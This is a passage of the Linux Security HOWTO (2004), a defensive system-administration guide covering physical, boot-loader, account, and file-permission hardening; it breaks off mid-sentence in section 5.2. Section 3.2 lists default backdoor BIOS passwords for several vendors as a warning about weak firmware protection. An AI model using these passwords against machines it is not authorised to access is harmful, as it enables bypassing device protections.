LDP/LDP/guide/docbook/Linux-Networking/Security.xml

Linux Security HOWTO

Kevin Fenzi

tummy.com, ltd.

<kevin-securityhowto@tummy.com>

Dave Wreski

linuxsecurity.com

<dave@linuxsecurity.com>

v2.3, 22 January 2004


 This document is a general overview of security issues that face the
administrator of Linux systems. It covers general security philosophy and a
number of specific examples of how to better secure your Linux system from
intruders. Also included are pointers to security-related material and
programs. Improvements, constructive criticism, additions and corrections are
gratefully accepted. Please mail your feedback to both authors, with
"Security HOWTO" in the subject.

-----------------------------------------------------------------------------
Table of Contents
1. Introduction
    1.1. New Versions of this Document
    1.2. Feedback
    1.3. Disclaimer
    1.4. Copyright Information


2. Overview
    2.1. Why Do We Need Security?
    2.2. How Secure Is Secure?
    2.3. What Are You Trying to Protect?
    2.4. Developing A Security Policy
    2.5. Means of Securing Your Site
    2.6. Organization of This Document


3. Physical Security
    3.1. Computer locks
    3.2. BIOS Security
    3.3. Boot Loader Security
    3.4. xlock and vlock
    3.5. Security of local devices
    3.6. Detecting Physical Security Compromises


4. Local Security
    4.1. Creating New Accounts
    4.2. Root Security


5. Files and File system Security
    5.1. Umask Settings
    5.2. File Permissions
    5.3. Integrity Checking
    5.4. Trojan Horses


6. Password Security and Encryption
    6.1. PGP and Public-Key Cryptography
    6.2. SSL, S-HTTP and S/MIME
    6.3. Linux IPSEC Implementations
    6.4. ssh (Secure Shell) and stelnet
    6.5. PAM - Pluggable Authentication Modules
    6.6. Cryptographic IP Encapsulation (CIPE)
    6.7. Kerberos
    6.8. Shadow Passwords.
    6.9. "Crack" and "John the Ripper"
    6.10. CFS - Cryptographic File System and TCFS - Transparent
        Cryptographic File System
    6.11. X11, SVGA and display security


7. Kernel Security
    7.1. 2.0 Kernel Compile Options
    7.2. 2.2 Kernel Compile Options
    7.3. Kernel Devices


8. Network Security
    8.1. Packet Sniffers
    8.2. System services and tcp_wrappers
    8.3. Verify Your DNS Information
    8.4. identd
    8.5. Configuring and Securing the Postfix MTA
    8.6. SATAN, ISS, and Other Network Scanners
    8.7. sendmail, qmail and MTA's
    8.8. Denial of Service Attacks
    8.9. NFS (Network File System) Security.
    8.10. NIS (Network Information Service) (formerly YP).
    8.11. Firewalls
    8.12. IP Chains - Linux Kernel 2.2.x Firewalling
    8.13. Netfilter - Linux Kernel 2.4.x Firewalling
    8.14. VPNs - Virtual Private Networks


9. Security Preparation (before you go on-line)
    9.1. Make a Full Backup of Your Machine
    9.2. Choosing a Good Backup Schedule
    9.3. Testing your backups
    9.4. Backup Your RPM or Debian File Database
    9.5. Keep Track of Your System Accounting Data
    9.6. Apply All New System Updates.


10. What To Do During and After a Breakin
    10.1. Security Compromise Underway.
    10.2. Security Compromise has already happened


11. Security Sources
    11.1. LinuxSecurity.com References
    11.2. FTP Sites
    11.3. Web Sites
    11.4. Mailing Lists
    11.5. Books - Printed Reading Material


12. Glossary
13. Frequently Asked Questions
14. Conclusion
15. Acknowledgments

1. Introduction

 This document covers some of the main issues that affect Linux security.
General philosophy and net-born resources are discussed.

 A number of other HOWTO documents overlap with security issues, and those
documents have been pointed to wherever appropriate.

 This document is not meant to be a up-to-date exploits document. Large
numbers of new exploits happen all the time. This document will tell you
where to look for such up-to-date information, and will give some general
methods to prevent such exploits from taking place.
-----------------------------------------------------------------------------

1.1. New Versions of this Document

 New versions of this document will be periodically posted to
comp.os.linux.answers. They will also be added to the various sites that
archive such information, including:

 [http://www.linuxdoc.org/] http://www.linuxdoc.org/

 The very latest version of this document should also be available in various
formats from:


<A0><A0>*<2A> [http://scrye.com/~kevin/lsh/] http://scrye.com/~kevin/lsh/

<A0><A0>*<2A> [http://www.linuxsecurity.com/docs/Security-HOWTO] http://
    www.linuxsecurity.com/docs/Security-HOWTO

<A0><A0>*<2A> [http://www.tummy.com/security-howto] http://www.tummy.com/
    security-howto


-----------------------------------------------------------------------------
1.2. Feedback

 All comments, error reports, additional information and criticism of all
sorts should be directed to:

 [mailto:kevin-securityhowto@tummy.com] kevin-securityhowto@tummy.com

 and

 [mailto:dave@linuxsecurity.com] dave@linuxsecurity.com

 Note: Please send your feedback to both authors. Also, be sure and include
"Linux" "security", or "HOWTO" in your subject to avoid Kevin's spam filter.
-----------------------------------------------------------------------------

1.3. Disclaimer

 No liability for the contents of this document can be accepted. Use the
concepts, examples and other content at your own risk. Additionally, this is
an early version, possibly with many inaccuracies or errors.

 A number of the examples and descriptions use the RedHat(tm) package layout
and system setup. Your mileage may vary.

 As far as we know, only programs that, under certain terms may be used or
evaluated for personal purposes will be described. Most of the programs will
be available, complete with source, under [http://www.gnu.org/copyleft/
gpl.html] GNU terms.
-----------------------------------------------------------------------------

1.4. Copyright Information

 This document is copyrighted (c)1998-2000 Kevin Fenzi and Dave Wreski, and
distributed under the following terms:


<A0><A0>*<2A>  Linux HOWTO documents may be reproduced and distributed in whole or in
    part, in any medium, physical or electronic, as long as this copyright
    notice is retained on all copies. Commercial redistribution is allowed
    and encouraged; however, the authors would like to be notified of any
    such distributions.

<A0><A0>*<2A>  All translations, derivative works, or aggregate works incorporating
    any Linux HOWTO documents must be covered under this copyright notice.
    That is, you may not produce a derivative work from a HOWTO and impose
    additional restrictions on its distribution. Exceptions to these rules
    may be granted under certain conditions; please contact the Linux HOWTO
    coordinator at the address given below.

<A0><A0>*<2A>  If you have questions, please contact Tim Bynum, the Linux HOWTO
    coordinator, at


 [mailto:tjbynum@metalab.unc.edu] tjbynum@metalab.unc.edu
-----------------------------------------------------------------------------

2. Overview

 This document will attempt to explain some procedures and commonly-used
software to help your Linux system be more secure. It is important to discuss
some of the basic concepts first, and create a security foundation, before we
get started.
-----------------------------------------------------------------------------

2.1. Why Do We Need Security?

 In the ever-changing world of global data communications, inexpensive
Internet connections, and fast-paced software development, security is
becoming more and more of an issue. Security is now a basic requirement
because global computing is inherently insecure. As your data goes from point
A to point B on the Internet, for example, it may pass through several other
points along the way, giving other users the opportunity to intercept, and
even alter, it. Even other users on your system may maliciously transform
your data into something you did not intend. Unauthorized access to your
system may be obtained by intruders, also known as "crackers", who then use
advanced knowledge to impersonate you, steal information from you, or even
deny you access to your own resources. If you're wondering what the
difference is between a "Hacker" and a "Cracker", see Eric Raymond's
document, "How to Become A Hacker", available at [http://www.catb.org/~esr/
faqs/hacker-howto.html] http://www.catb.org/~esr/faqs/hacker-howto.html.
-----------------------------------------------------------------------------

2.2. How Secure Is Secure?

 First, keep in mind that no computer system can ever be completely secure.
All you can do is make it increasingly difficult for someone to compromise
your system. For the average home Linux user, not much is required to keep
the casual cracker at bay. However, for high-profile Linux users (banks,
telecommunications companies, etc), much more work is required.

 Another factor to take into account is that the more secure your system is,
the more intrusive your security becomes. You need to decide where in this
balancing act your system will still be usable, and yet secure for your
purposes. For instance, you could require everyone dialing into your system
to use a call-back modem to call them back at their home number. This is more
secure, but if someone is not at home, it makes it difficult for them to
login. You could also setup your Linux system with no network or connection
to the Internet, but this limits its usefulness.

 If you are a medium to large-sized site, you should establish a security
policy stating how much security is required by your site and what auditing
is in place to check it. You can find a well-known security policy example at
[http://www.faqs.org/rfcs/rfc2196.html] http://www.faqs.org/rfcs/
rfc2196.html. It has been recently updated, and contains a great framework
for establishing a security policy for your company.
-----------------------------------------------------------------------------

2.3. What Are You Trying to Protect?

 Before you attempt to secure your system, you should determine what level of
threat you have to protect against, what risks you should or should not take,
and how vulnerable your system is as a result. You should analyze your system
to know what you're protecting, why you're protecting it, what value it has,
and who has responsibility for your data and other assets.


<A0><A0>*<2A> Risk is the possibility that an intruder may be successful in attempting
    to access your computer. Can an intruder read or write files, or execute
    programs that could cause damage? Can they delete critical data? Can they
    prevent you or your company from getting important work done? Don't
    forget: someone gaining access to your account, or your system, can also
    impersonate you.

     Additionally, having one insecure account on your system can result in
    your entire network being compromised. If you allow a single user to
    login using a .rhosts file, or to use an insecure service such as tftp,
    you risk an intruder getting 'his foot in the door'. Once the intruder
    has a user account on your system, or someone else's system, it can be
    used to gain access to another system, or another account.

<A0><A0>*<2A> Threat is typically from someone with motivation to gain unauthorized
    access to your network or computer. You must decide whom you trust to
    have access to your system, and what threat they could pose.

     There are several types of intruders, and it is useful to keep their
    different characteristics in mind as you are securing your systems.

    <20><>+<2B> The Curious - This type of intruder is basically interested in
        finding out what type of system and data you have.

    <20><>+<2B> The Malicious - This type of intruder is out to either bring down
        your systems, or deface your web page, or otherwise force you to
        spend time and money recovering from the damage he has caused.

    <20><>+<2B> The High-Profile Intruder - This type of intruder is trying to use
        your system to gain popularity and infamy. He might use your
        high-profile system to advertise his abilities.

    <20><>+<2B> The Competition - This type of intruder is interested in what data
        you have on your system. It might be someone who thinks you have
        something that could benefit him, financially or otherwise.

    <20><>+<2B> The Borrowers - This type of intruder is interested in setting up
        shop on your system and using its resources for their own purposes.
        He typically will run chat or irc servers, porn archive sites, or
        even DNS servers.

    <20><>+<2B> The Leapfrogger - This type of intruder is only interested in your
        system to use it to get into other systems. If your system is
        well-connected or a gateway to a number of internal hosts, you may
        well see this type trying to compromise your system.


<A0><A0>*<2A> Vulnerability describes how well-protected your computer is from another
    network, and the potential for someone to gain unauthorized access.

     What's at stake if someone breaks into your system? Of course the
    concerns of a dynamic PPP home user will be different from those of a
    company connecting their machine to the Internet, or another large
    network.

     How much time would it take to retrieve/recreate any data that was lost?
    An initial time investment now can save ten times more time later if you
    have to recreate data that was lost. Have you checked your backup
    strategy, and verified your data lately?


-----------------------------------------------------------------------------
2.4. Developing A Security Policy

 Create a simple, generic policy for your system that your users can readily
understand and follow. It should protect the data you're safeguarding as well
as the privacy of the users. Some things to consider adding are: who has
access to the system (Can my friend use my account?), who's allowed to
install software on the system, who owns what data, disaster recovery, and
appropriate use of the system.

 A generally-accepted security policy starts with the phrase

 " That which is not permitted is prohibited"

 This means that unless you grant access to a service for a user, that user
shouldn't be using that service until you do grant access. Make sure the
policies work on your regular user account. Saying, "Ah, I can't figure out
this permissions problem, I'll just do it as root" can lead to security holes
that are very obvious, and even ones that haven't been exploited yet.

 [ftp://www.faqs.org/rfcs/rfc1244.html] rfc1244 is a document that describes
how to create your own network security policy.

 [ftp://www.faqs.org/rfcs/rfc1281.html] rfc1281 is a document that shows an
example security policy with detailed descriptions of each step.

 Finally, you might want to look at the COAST policy archive at [ftp://
coast.cs.purdue.edu/pub/doc/policy] ftp://coast.cs.purdue.edu/pub/doc/policy
to see what some real-life security policies look like.
-----------------------------------------------------------------------------

2.5. Means of Securing Your Site

 This document will discuss various means with which you can secure the
assets you have worked hard for: your local machine, your data, your users,
your network, even your reputation. What would happen to your reputation if
an intruder deleted some of your users' data? Or defaced your web site? Or
published your company's corporate project plan for next quarter? If you are
planning a network installation, there are many factors you must take into
account before adding a single machine to your network.

 Even if you have a single dial up PPP account, or just a small site, this
does not mean intruders won't be interested in your systems. Large,
high-profile sites are not the only targets -- many intruders simply want to
exploit as many sites as possible, regardless of their size. Additionally,
they may use a security hole in your site to gain access to other sites
you're connected to.

 Intruders have a lot of time on their hands, and can avoid guessing how
you've obscured your system just by trying all the possibilities. There are
also a number of reasons an intruder may be interested in your systems, which
we will discuss later.
-----------------------------------------------------------------------------

2.5.1. Host Security

 Perhaps the area of security on which administrators concentrate most is
host-based security. This typically involves making sure your own system is
secure, and hoping everyone else on your network does the same. Choosing good
passwords, securing your host's local network services, keeping good
accounting records, and upgrading programs with known security exploits are
among the things the local security administrator is responsible for doing.
Although this is absolutely necessary, it can become a daunting task once
your network becomes larger than a few machines.
-----------------------------------------------------------------------------

2.5.2. Local Network Security

 Network security is as necessary as local host security. With hundreds,
thousands, or more computers on the same network, you can't rely on each one
of those systems being secure. Ensuring that only authorized users can use
your network, building firewalls, using strong encryption, and ensuring there
are no "rogue" (that is, unsecured) machines on your network are all part of
the network security administrator's duties.

 This document will discuss some of the techniques used to secure your site,
and hopefully show you some of the ways to prevent an intruder from gaining
access to what you are trying to protect.
-----------------------------------------------------------------------------

2.5.3. Security Through Obscurity

 One type of security that must be discussed is "security through obscurity".
This means, for example, moving a service that has known security
vulnerabilities to a non-standard port in hopes that attackers won't notice
it's there and thus won't exploit it. Rest assured that they can determine
that it's there and will exploit it. Security through obscurity is no
security at all. Simply because you may have a small site, or a relatively
low profile, does not mean an intruder won't be interested in what you have.
We'll discuss what you're protecting in the next sections.
-----------------------------------------------------------------------------

2.6. Organization of This Document

 This document has been divided into a number of sections. They cover several
broad security issues. The first, Section 3, covers how you need to protect
your physical machine from tampering. The second, Section 4, describes how to
protect your system from tampering by local users. The third, Section 5,
shows you how to setup your file systems and permissions on your files. The
next, Section 6, discusses how to use encryption to better secure your
machine and network. Section 7 discusses what kernel options you should set
or be aware of for a more secure system. Section 8, describes how to better
secure your Linux system from network attacks. Section 9, discusses how to
prepare your machine(s) before bringing them on-line. Next, Section 10,
discusses what to do when you detect a system compromise in progress or
detect one that has recently happened. In Section 11, some primary security
resources are enumerated. The Q and A section Section 13, answers some
frequently-asked questions, and finally a conclusion in Section 14

 The two main points to realize when reading this document are:


<A0><A0>*<2A> Be aware of your system. Check system logs such as /var/log/messages and
    keep an eye on your system, and

<A0><A0>*<2A> Keep your system up-to-date by making sure you have installed the
    current versions of software and have upgraded per security alerts. Just
    doing this will help make your system markedly more secure.


-----------------------------------------------------------------------------
3. Physical Security

 The first layer of security you need to take into account is the physical
security of your computer systems. Who has direct physical access to your
machine? Should they? Can you protect your machine from their tampering?
Should you?

 How much physical security you need on your system is very dependent on your
situation, and/or budget.

 If you are a home user, you probably don't need a lot (although you might
need to protect your machine from tampering by children or annoying
relatives). If you are in a lab, you need considerably more, but users will
still need to be able to get work done on the machines. Many of the following
sections will help out. If you are in an office, you may or may not need to
secure your machine off-hours or while you are away. At some companies,
leaving your console unsecured is a termination offense.

 Obvious physical security methods such as locks on doors, cables, locked
cabinets, and video surveillance are all good ideas, but beyond the scope of
this document. :)
-----------------------------------------------------------------------------

3.1. Computer locks

 Many modern PC cases include a "locking" feature. Usually this will be a
socket on the front of the case that allows you to turn an included key to a
locked or unlocked position. Case locks can help prevent someone from
stealing your PC, or opening up the case and directly manipulating/stealing
your hardware. They can also sometimes prevent someone from rebooting your
computer from their own floppy or other hardware.

 These case locks do different things according to the support in the
motherboard and how the case is constructed. On many PC's they make it so you
have to break the case to get the case open. On some others, they will not
let you plug in new keyboards or mice. Check your motherboard or case
instructions for more information. This can sometimes be a very useful
feature, even though the locks are usually very low-quality and can easily be
defeated by attackers with locksmithing.

 Some machines (most notably SPARC's and macs) have a dongle on the back
that, if you put a cable through, attackers would have to cut the cable or
break the case to get into it. Just putting a padlock or combo lock through
these can be a good deterrent to someone stealing your machine.
-----------------------------------------------------------------------------

3.2. BIOS Security

 The BIOS is the lowest level of software that configures or manipulates your
x86-based hardware. LILO and other Linux boot methods access the BIOS to
determine how to boot up your Linux machine. Other hardware that Linux runs
on has similar software (Open Firmware on Macs and new Suns, Sun boot PROM,
etc...). You can use your BIOS to prevent attackers from rebooting your
machine and manipulating your Linux system.

 Many PC BIOSs let you set a boot password. This doesn't provide all that
much security (the BIOS can be reset, or removed if someone can get into the
case), but might be a good deterrent (i.e. it will take time and leave traces
of tampering). Similarly, on S/Linux (Linux for SPARC(tm) processor
machines), your EEPROM can be set to require a boot-up password. This might
slow attackers down.

 Another risk of trusting BIOS passwords to secure your system is the default
password problem. Most BIOS makers don't expect people to open up their
computer and disconnect batteries if they forget their password and have
equipped their BIOSes with default passwords that work regardless of your
chosen password. Some of the more common passwords include:

 j262 AWARD_SW AWARD_PW lkwpeter Biostar AMI Award bios BIOS setup cmos AMI!
SW1 AMI?SW1 password hewittrand shift + s y x z

 I tested an Award BIOS and AWARD_PW worked. These passwords are quite easily
available from manufacturers' websites and [http://astalavista.box.sk] http:/
/astalavista.box.sk and as such a BIOS password cannot be considered adequate
protection from a knowledgeable attacker.

 Many x86 BIOSs also allow you to specify various other good security
settings. Check your BIOS manual or look at it the next time you boot up. For
example, some BIOSs disallow booting from floppy drives and some require
passwords to access some BIOS features.

 Note: If you have a server machine, and you set up a boot password, your
machine will not boot up unattended. Keep in mind that you will need to come
in and supply the password in the event of a power failure. ;(
-----------------------------------------------------------------------------

3.3. Boot Loader Security

 The various Linux boot loaders also can have a boot password set. LILO, for
example, has password and restricted settings; password requires password at
boot time, whereas restricted requires a boot-time password only if you
specify options (such as single) at the LILO prompt.

 >From the lilo.conf man page:
password=password
              The per-image option `password=...' (see below) applies to all images.

restricted
              The per-image option `restricted' (see below) applies to all images.

       password=password
              Protect the image by a password.

       restricted
              A password is only required to boot the image if
              parameters are specified  on  the  command  line
              (e.g. single).

 Keep in mind when setting all these passwords that you need to remember
them. :) Also remember that these passwords will merely slow the determined
attacker. They won't prevent someone from booting from a floppy, and mounting
your root partition. If you are using security in conjunction with a boot
loader, you might as well disable booting from a floppy in your computer's
BIOS, and password-protect the BIOS.

 Also keep in mind that the /etc/lilo.conf will need to be mode "600"
(readable and writing for root only), or others will be able to read your
passwords!

 >From the GRUB info page: GRUB provides "password" feature, so that only
administrators can start the interactive operations (i.e. editing menu
entries and entering the command-line interface). To use this feature, you
need to run the command `password' in your configuration file (*note
password::), like this:

  password --md5 PASSWORD

  If this is specified, GRUB disallows any interactive control, until you
press the key <p> and enter a correct password. The option `--md5' tells GRUB
that `PASSWORD' is in MD5 format. If it is omitted, GRUB assumes the
`PASSWORD' is in clear text.

  You can encrypt your password with the command `md5crypt' (*note
md5crypt::). For example, run the grub shell (*note Invoking the grub
shell::), and enter your password:

  grub> md5crypt Password: ********** Encrypted: $1$U$JK7xFegdxWH6VuppCUSIb.

  Then, cut and paste the encrypted password to your configuration file.

 Grub also has a 'lock' command that will allow you to lock a partition if
you don't provide the correct password. Simply add 'lock' and the partition
will not be accessable until the user supplies a password.

 If anyone has security-related information from a different boot loader, we
would love to hear it. (grub, silo, milo, linload, etc).

 Note: If you have a server machine, and you set up a boot password, your
machine will not boot up unattended. Keep in mind that you will need to come
in and supply the password in the event of a power failure. ;(
-----------------------------------------------------------------------------

3.4. xlock and vlock

 If you wander away from your machine from time to time, it is nice to be
able to "lock" your console so that no one can tamper with, or look at, your
work. Two programs that do this are: xlock and vlock.

 xlock is a X display locker. It should be included in any Linux
distributions that support X. Check out the man page for it for more options,
but in general you can run xlock from any xterm on your console and it will
lock the display and require your password to unlock.

 vlock is a simple little program that allows you to lock some or all of the
virtual consoles on your Linux box. You can lock just the one you are working
in or all of them. If you just lock one, others can come in and use the
console; they will just not be able to use your virtual console until you
unlock it. vlock ships with RedHat Linux, but your mileage may vary.

 Of course locking your console will prevent someone from tampering with your
work, but won't prevent them from rebooting your machine or otherwise
disrupting your work. It also does not prevent them from accessing your
machine from another machine on the network and causing problems.

 More importantly, it does not prevent someone from switching out of the X
Window System entirely, and going to a normal virtual console login prompt,
or to the VC that X11 was started from, and suspending it, thus obtaining
your privileges. For this reason, you might consider only using it while
under control of xdm.
-----------------------------------------------------------------------------

3.5. Security of local devices

 If you have a webcam or a microphone attached to your system, you should
consider if there is some danger of a attacker gaining access to those
devices. When not in use, unplugging or removing such devices might be an
option. Otherwise you should carefully read and look at any software with
provides access to such devices.
-----------------------------------------------------------------------------

3.6. Detecting Physical Security Compromises

 The first thing to always note is when your machine was rebooted. Since
Linux is a robust and stable OS, the only times your machine should reboot is
when you take it down for OS upgrades, hardware swapping, or the like. If
your machine has rebooted without you doing it, that may be a sign that an
intruder has compromised it. Many of the ways that your machine can be
compromised require the intruder to reboot or power off your machine.

 Check for signs of tampering on the case and computer area. Although many
intruders clean traces of their presence out of logs, it's a good idea to
check through them all and note any discrepancy.

 It is also a good idea to store log data at a secure location, such as a
dedicated log server within your well-protected network. Once a machine has
been compromised, log data becomes of little use as it most likely has also
been modified by the intruder.

 The syslog daemon can be configured to automatically send log data to a
central syslog server, but this is typically sent unencrypted, allowing an
intruder to view data as it is being transferred. This may reveal information
about your network that is not intended to be public. There are syslog
daemons available that encrypt the data as it is being sent.

 Also be aware that faking syslog messages is easy -- with an exploit program
having been published. Syslog even accepts net log entries claiming to come
from the local host without indicating their true origin.

 Some things to check for in your logs:

<A0><A0>*<2A> Short or incomplete logs.

<A0><A0>*<2A> Logs containing strange timestamps.

<A0><A0>*<2A> Logs with incorrect permissions or ownership.

<A0><A0>*<2A> Records of reboots or restarting of services.

<A0><A0>*<2A> missing logs.

<A0><A0>*<2A> su entries or logins from strange places.


 We will discuss system log data Section 9.5 in the HOWTO.
-----------------------------------------------------------------------------

4. Local Security

 The next thing to take a look at is the security in your system against
attacks from local users. Did we just say local users? Yes!

 Getting access to a local user account is one of the first things that
system intruders attempt while on their way to exploiting the root account.
With lax local security, they can then "upgrade" their normal user access to
root access using a variety of bugs and poorly setup local services. If you
make sure your local security is tight, then the intruder will have another
hurdle to jump.

 Local users can also cause a lot of havoc with your system even (especially)
if they really are who they say they are. Providing accounts to people you
don't know or for whom you have no contact information is a very bad idea.
-----------------------------------------------------------------------------

4.1. Creating New Accounts

 You should make sure you provide user accounts with only the minimal
requirements for the task they need to do. If you provide your son (age 10)
with an account, you might want him to only have access to a word processor
or drawing program, but be unable to delete data that is not his.

 Several good rules of thumb when allowing other people legitimate access to
your Linux machine:


<A0><A0>*<2A> Give them the minimal amount of privileges they need.

<A0><A0>*<2A> Be aware when/where they login from, or should be logging in from.

<A0><A0>*<2A> Make sure you remove inactive accounts, which you can determine by using
    the 'last' command and/or checking log files for any activity by the
    user.

<A0><A0>*<2A> The use of the same userid on all computers and networks is advisable to
    ease account maintenance, and permits easier analysis of log data.

<A0><A0>*<2A> The creation of group user-id's should be absolutely prohibited. User
    accounts also provide accountability, and this is not possible with group
    accounts.


 Many local user accounts that are used in security compromises have not been
used in months or years. Since no one is using them they, provide the ideal
attack vehicle.
-----------------------------------------------------------------------------

4.2. Root Security

 The most sought-after account on your machine is the root (superuser)
account. This account has authority over the entire machine, which may also
include authority over other machines on the network. Remember that you
should only use the root account for very short, specific tasks, and should
mostly run as a normal user. Even small mistakes made while logged in as the
root user can cause problems. The less time you are on with root privileges,
the safer you will be.

 Several tricks to avoid messing up your own box as root:

<A0><A0>*<2A> When doing some complex command, try running it first in a
    non-destructive way...especially commands that use globing: e.g., if you
    want to do rm foo*.bak, first do ls foo*.bak and make sure you are going
    to delete the files you think you are. Using echo in place of destructive
    commands also sometimes works.

<A0><A0>*<2A> Provide your users with a default alias to the rm command to ask for
    confirmation for deletion of files.

<A0><A0>*<2A>  Only become root to do single specific tasks. If you find yourself
    trying to figure out how to do something, go back to a normal user shell
    until you are sure what needs to be done by root.

<A0><A0>*<2A> The command path for the root user is very important. The command path
    (that is, the PATH environment variable) specifies the directories in
    which the shell searches for programs. Try to limit the command path for
    the root user as much as possible, and never include . (which means "the
    current directory") in your PATH. Additionally, never have writable
    directories in your search path, as this can allow attackers to modify or
    place new binaries in your search path, allowing them to run as root the
    next time you run that command.

<A0><A0>*<2A> Never use the rlogin/rsh/rexec suite of tools (called the r-utilities)
    as root. They are subject to many sorts of attacks, and are downright
    dangerous when run as root. Never create a .rhosts file for root.

<A0><A0>*<2A> The /etc/securetty file contains a list of terminals that root can login
    from. By default (on Red Hat Linux) this is set to only the local virtual
    consoles(vtys). Be very wary of adding anything else to this file. You
    should be able to login remotely as your regular user account and then su
    if you need to (hopefully over Section 6.4 or other encrypted channel),
    so there is no need to be able to login directly as root.

<A0><A0>*<2A> Always be slow and deliberate running as root. Your actions could affect
    a lot of things. Think before you type!


 If you absolutely positively need to allow someone (hopefully very trusted)
to have root access to your machine, there are a few tools that can help.
sudo allows users to use their password to access a limited set of commands
as root. This would allow you to, for instance, let a user be able to eject
and mount removable media on your Linux box, but have no other root
privileges. sudo also keeps a log of all successful and unsuccessful sudo
attempts, allowing you to track down who used what command to do what. For
this reason sudo works well even in places where a number of people have root
access, because it helps you keep track of changes made.

 Although sudo can be used to give specific users specific privileges for
specific tasks, it does have several shortcomings. It should be used only for
a limited set of tasks, like restarting a server, or adding new users. Any
program that offers a shell escape will give root access to a user invoking
it via sudo. This includes most editors, for example. Also, a program as
innocuous as /bin/cat can be used to overwrite files, which could allow root
to be exploited. Consider sudo as a means for accountability, and don't
expect it to replace the root user and still be secure.
-----------------------------------------------------------------------------

5. Files and File system Security

 A few minutes of preparation and planning ahead before putting your systems
on-line can help to protect them and the data stored on them.

<A0><A0>*<2A> There should never be a reason for users' home directories to allow SUID
    /SGID programs to be run from there. Use the nosuid option in /etc/fstab
    for partitions that are writable by others than root. You may also wish
    to use nodev and noexec on users' home partitions, as well as /var, thus
    prohibiting execution of programs, and creation of character or block
    devices, which should never be necessary anyway.

<A0><A0>*<2A> If you are exporting file-systems using NFS, be sure to configure /etc/
    exports with the most restrictive access possible. This means not using
    wild cards, not allowing root write access, and exporting read-only
    wherever possible.

<A0><A0>*<2A> Configure your users' file-creation umask to be as restrictive as
    possible. See Section 5.1.

<A0><A0>*<2A> If you are mounting file systems using a network file system such as
    NFS, be sure to configure /etc/exports with suitable restrictions.
    Typically, using `nodev', `nosuid', and perhaps `noexec', are desirable.

<A0><A0>*<2A> Set file system limits instead of allowing unlimited as is the default.
    You can control the per-user limits using the resource-limits PAM module
    and /etc/pam.d/limits.conf. For example, limits for group users might
    look like this:


                    @users     hard  core    0
                    @users     hard  nproc   50
                    @users     hard  rss     5000

     This says to prohibit the creation of core files, restrict the number of
    processes to 50, and restrict memory usage per user to 5M.

     You can also use the /etc/login.defs configuration file to set the same
    limits.

<A0><A0>*<2A> The /var/log/wtmp and /var/run/utmp files contain the login records for
    all users on your system. Their integrity must be maintained because they
    can be used to determine when and from where a user (or potential
    intruder) has entered your system. These files should also have 644
    permissions, without affecting normal system operation.

<A0><A0>*<2A> The immutable bit can be used to prevent accidentally deleting or
    overwriting a file that must be protected. It also prevents someone from
    creating a hard link to the file. See the chattr(1) man page for
    information on the immutable bit.

<A0><A0>*<2A>  SUID and SGID files on your system are a potential security risk, and
    should be monitored closely. Because these programs grant special
    privileges to the user who is executing them, it is necessary to ensure
    that insecure programs are not installed. A favorite trick of crackers is
    to exploit SUID-root programs, then leave a SUID program as a back door
    to get in the next time, even if the original hole is plugged.

     Find all SUID/SGID programs on your system, and keep track of what they
    are, so you are aware of any changes which could indicate a potential
    intruder. Use the following command to find all SUID/SGID programs on
    your system:


                    root#  find / -type f \( -perm -04000 -o -perm -02000 \)

     The Debian distribution runs a job each night to determine what SUID
    files exist. It then compares this to the previous night's run. You can
    look in /var/log/setuid* for this log.

     You can remove the SUID or SGID permissions on a suspicious program with
    chmod, then restore them back if you absolutely feel it is necessary.

<A0><A0>*<2A> World-writable files, particularly system files, can be a security hole
    if a cracker gains access to your system and modifies them. Additionally,
    world-writable directories are dangerous, since they allow a cracker to
    add or delete files as he wishes. To locate all world-writable files on
    your system, use the following command:


                    root# find / -perm -2 ! -type l -ls
    and be sure you know why those files are writable. In the normal course
    of operation, several files will be world-writable, including some from /
    dev, and symbolic links, thus the ! -type l which excludes these from the
    previous find command.

<A0><A0>*<2A>

     Unowned files may also be an indication an intruder has accessed your
    system. You can locate files on your system that have no owner, or belong
    to no group with the command:


                    root# find / \( -nouser -o -nogroup \) -print

<A0><A0>*<2A> Finding .rhosts files should be a part of your regular system
    administration duties, as these files should not be permitted on your
    system. Remember, a cracker only needs one insecure account to
    potentially gain access to your entire network. You can locate all
    .rhosts files on your system with the following command:
                   root# find /home -name .rhosts -print

<A0><A0>*<2A>

     Finally, before changing permissions on any system files, make sure you
    understand what you are doing. Never change permissions on a file because
    it seems like the easy way to get things working. Always determine why
    the file has that permission before changing it.


-----------------------------------------------------------------------------
5.1. Umask Settings

 The umask command can be used to determine the default file creation mode on
your system. It is the octal complement of the desired file mode. If files
are created without any regard to their permissions settings, the user could
inadvertently give read or write permission to someone that should not have
this permission. Typical umask settings include 022, 027, and 077 (which is
the most restrictive). Normally the umask is set in /etc/profile, so it
applies to all users on the system. The resulting permission is calculated as
follows: The default permission of user/group/others (7 for directories, 6
for files) is combined with the inverted mask (NOT) using AND on a
per-bit-basis.

 Example 1:

 file, default 6, binary: 110 mask, eg. 2: 010, NOT: 101

 resulting permission, AND: 100 (equals 4, r__)

 Example 2:

 file, default 6, binary: 110 mask, eg. 6: 110, NOT: 001

 resulting permission, AND: 000 (equals 0, ___)

 Example 3:

 directory, default 7, binary: 111 mask, eg. 2: 010, NOT: 101

 resulting permission, AND: 101 (equals 5, r_x)

 Example 4:

 directory, default 7, binary: 111 mask, eg. 6: 110, NOT: 001

 resulting permission, AND: 001 (equals 1, __x)


                # Set the user's default umask
                umask 033
Be sure to make root's umask 077, which will disable read, write, and execute
permission for other users, unless explicitly changed using chmod. In this
case, newly-created directories would have 744 permissions, obtained by
subtracting 033 from 777. Newly-created files using the 033 umask would have
permissions of 644.

 If you are using Red Hat, and adhere to their user and group ID creation
scheme (User Private Groups), it is only necessary to use 002 for a umask.
This is due to the fact that the default configuration is one user per group.
-----------------------------------------------------------------------------

5.2. File Permissions

 It's important to ensure that your system files are not open for casual
editing by users and groups who shouldn't be doing such system maintenance.

 Unix separates access control on files and directories according to three
characteristics: owner, group, and other. There is always exactly one owner,
any number of members of the group, and everyone else.

 A quick explanation of Unix permissions:

 Ownership - Which user(s) and group(s) retain(s) control of the permission
settings of the node and parent of the node

 Permissions - Bits capable of being set or reset to allow certain types of
access to it. Permissions for directories may have a different meaning than
the same set of permissions on files.

 Read:

<A0><A0>*<2A> To be able to view contents of a file

<A0><A0>*<2A> To be able to read a directory


 Write:

<A0><A0>*<2A> To be able to add to or change a file

<A0><A0>*<2A> To be able to delete or move files in a directory


 Execute:

<A0><A0>*<2A> To be able to run a binary program or shell script

<A0><A0>*<2A> To be able to search in a directory, combined with read permission


Save Text Attribute: (For directories)
     The "sticky bit" also has a different meaning when applied to
